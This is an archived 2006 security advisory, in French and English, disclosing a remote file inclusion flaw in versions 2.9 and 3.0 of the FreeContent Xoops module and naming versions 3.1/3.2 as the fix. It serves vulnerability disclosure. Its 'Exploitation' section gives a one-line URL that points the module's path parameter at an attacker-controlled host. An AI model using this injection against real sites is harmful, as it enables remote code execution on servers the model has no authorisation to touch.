what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FreeContent.txt

FreeContent.txt
Posted Apr 17, 2006
Authored by Silitix

Freecontent v2.9 and 3.0 suffer from a remote file inclusion vulnerability.

tags | advisory, remote, file inclusion
SHA-256 | 0c5a8a2a0dc2b4c5e66a279fc98f6a223de63ba736156083d1893868541416fc

FreeContent.txt

Change Mirror Download
------=_Part_19161_13964465.1145017194132
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Produit : FreeContent

La vuln=E9rabilit=E9 a =E9t=E9 identifi=E9 dans la version 2.9 et 3.0. D'au=
tres
versions peuvent =E9galement =EAtre affect=E9es.

Probl=E8me : Remote File Inclusion

Site officiel : http://www.wjue.org/ & http://www.guanxicrm.com/

Auteur : Silitix - Silitix@gmail.com

Description FR :
#############

Il fut le premier de sa g=E9n=E9ration concernant l'insertion de page HTML =
sur
xoops, maintenant d=E9tron=E9 par CJay-Content
une sorte de copie, freeContent est malgr=E9 lui toujours sur la place !
Il permet l'insertion de page html ou php que vous aurez au pr=E9alablement
d=E9posez sur votre serveur.
Dans cette nouvelle version 2.9, il a un d=E9but de reconnaissance concerna=
nt
les liens URL qui se trouveraient dans
vos pages... contrairement =E0 "C-Jay" qui ne g=E8re pas encore =E7=E0 !
Vous pourrez =E9galement cacher certaines pages pour ne pas qu'elles
apparaissent dans le bloc.

Description ENG :
#################

With WebDigest capability FreeContent becomes the first Knowledge oriented
content tool for Xoops.
FreeContent allows you not only to present easily a variety of contents but
also to make concept/topic oriented
WebIntelligence, to organize
community discussion with always up to date and fresh content and
information.
Freecontent WebDigest uses advanced and powerful Text Retrieving Technics t=
o
automatically generate
relevant contents for your website.


Exploitation :
###########

http://[target]/modules/freecontent/index.php?path=3D[attacker]

Solution
#########

Appliquer la mise =E0 jour disponible sur le sitte officiel, les
versions 3.1/3.2
ne sont pas affect=E9es.

###### ---- > Avis de s=E9curit=E9 original : www.Silitix.com/freecontent.t=
xt

------=_Part_19161_13964465.1145017194132
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Produit : FreeContent<br>
<br>
La vuln=E9rabilit=E9 a =E9t=E9 identifi=E9 dans la version 2.9 et 3.0. D'au=
tres versions peuvent =E9galement =EAtre affect=E9es.<br>
<br>
Probl=E8me : Remote File Inclusion<br>
<br>
Site officiel : <a href=3D"http://www.wjue.org/">http://www.wjue.org/</a> &=
amp; <a href=3D"http://www.guanxicrm.com/">http://www.guanxicrm.com/</a><br=
>
<br>
Auteur : Silitix - <a href=3D"mailto:Silitix@gmail.com">Silitix@gmail.com</=
a> <br>
<br>
Description FR : <br>
#############<br>
<br>
Il fut le premier de sa g=E9n=E9ration concernant l'insertion de page HTML =
sur xoops, maintenant d=E9tron=E9 par CJay-Content <br>
une sorte de copie, freeContent est malgr=E9 lui toujours sur la place !<br=
>
Il permet l'insertion de page html ou php que vous aurez au pr=E9alablement=
d=E9posez sur votre serveur.<br>
Dans cette nouvelle version 2.9, il a un d=E9but de reconnaissance concerna=
nt les liens URL qui se trouveraient dans<br>
vos pages... contrairement =E0 "C-Jay" qui ne g=E8re pas encore =
=E7=E0 !<br>
Vous pourrez =E9galement cacher certaines pages pour ne pas qu'elles appara=
issent dans le bloc.<br>
<br>
Description ENG :<br>
#################<br>
<br>
With WebDigest capability FreeContent becomes the first Knowledge oriented =
content tool for Xoops.<br>
FreeContent allows you not only to present easily a variety of contents but=
also to make concept/topic oriented <br>
WebIntelligence, to organize <br>
community discussion with always up to date and fresh content and informati=
on.<br>
Freecontent WebDigest uses advanced and powerful Text Retrieving Technics t=
o automatically generate <br>
relevant contents for your website.<br>
<br>
<br>
Exploitation : <br>
###########<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; http://[target]/modules/fr=
eecontent/index.php?path=3D[attacker]<br>
<br>
Solution<br>
#########<br>
<br>
&nbsp;Appliquer la mise =E0 jour disponible sur le sitte officiel, les vers=
ions 3.1/3.2 ne sont pas affect=E9es.<br>
<br>
###### ---- > Avis de s=E9curit=E9 original : <a href=3D"http://www.Sili=
tix.com/freecontent.txt">www.Silitix.com/freecontent.txt</a><br>
<br>

------=_Part_19161_13964465.1145017194132--
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close